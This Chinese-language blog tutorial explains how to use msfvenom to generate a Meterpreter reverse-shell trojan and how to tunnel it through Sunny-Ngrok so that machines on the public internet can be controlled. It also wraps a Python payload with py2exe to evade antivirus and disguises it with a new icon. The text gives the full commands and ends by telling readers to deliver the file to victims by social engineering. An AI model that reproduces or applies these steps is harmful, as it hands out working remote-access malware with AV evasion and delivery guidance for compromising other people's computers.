metasploit学习--联合Ngrok内网穿透生成木马远控主机
一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机
1.链接隧道 ./sunny clientid 隧道id
2.生成木马
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell.exe
这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了。
注意:
-a x64位,一定要对应-p x64位。
简单点来说,生成的exe是64位的,最好是只在64位的电脑上去运行。
千万不要把生成32位的exe放到64位的电脑上去运行,那样会造成失败或内存、CPU很高的情况。
6.msf开启监听,使用模块
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit
这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.结果,获取成功
外网主机也可以获取
二、利用py2exe生成免杀木马
1.链接隧道 ./sunny clientid 隧道id
2.生成木马
msfvenom -p python/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxx -f raw -o shell.py
这里的LHOST=xxx.idcfengye.com是获取到的服务器地址免费的一般是free,LPORT是你刚刚设置的隧道端口比如我的是10210,那么这里就填10210,对应版本的木马在前面更改一下就可以了
3.新建一个setup.py文件,代码如下:
from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console = ['shell.py'],
options = {'py2exe':{'bundle_files':1,'packages':'ctypes','includes':'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)
上面的console = [‘shell.py’] 里面是你刚刚生成py文件的名字
4.把setup.py和shell.py放在同一个文件夹,cmd进入路径,用pythoon py2exe模块进行封装生成可执行程序
python ./setup.py py2exe
5.生成完成之后,找到执行文件,可以替换图标实现伪装效果
6.查看免杀效果,基本上主流杀软都不报毒
6.msf开启监听
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
msf5 exploit(multi/handler) > set lport xxxx
msf5 exploit(multi/handler) > exploit
这里的端口是你设置的本地端口,我设置的是2333,那么就填2333,一切就绪就run
7.通过社工等手段,发送给受害人,执行打开,即可获取shell
上一篇: JVM针对String类型的优化
下一篇: Java String 引用类型